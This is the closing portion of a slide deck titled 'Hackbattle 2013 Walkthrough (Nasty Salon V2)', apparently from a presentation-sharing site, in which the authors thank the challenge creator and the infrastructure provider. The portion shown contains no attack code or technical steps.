Well we’d say we are done but we needed to share our joy so on to /var/www and
like any movie give credits to the actors :D
M a r c h 2 8 , 2 0 1 4

We’d like to thank Gichuki Jonia (./chuks) for the challenge we learnt a lot while
doing it and Azanuru for the infrastructure . Made all this possible
☺ .
M a r c h 2 8 , 2 0 1 4

Hackbattle 2013 Walkthrough (Nasty Salon V2)

Recommended

Recommended

More Related Content

Similar to Hackbattle 2013 Walkthrough (Nasty Salon V2)

Similar to Hackbattle 2013 Walkthrough (Nasty Salon V2) (20)

Recently uploaded

Recently uploaded (20)

Hackbattle 2013 Walkthrough (Nasty Salon V2)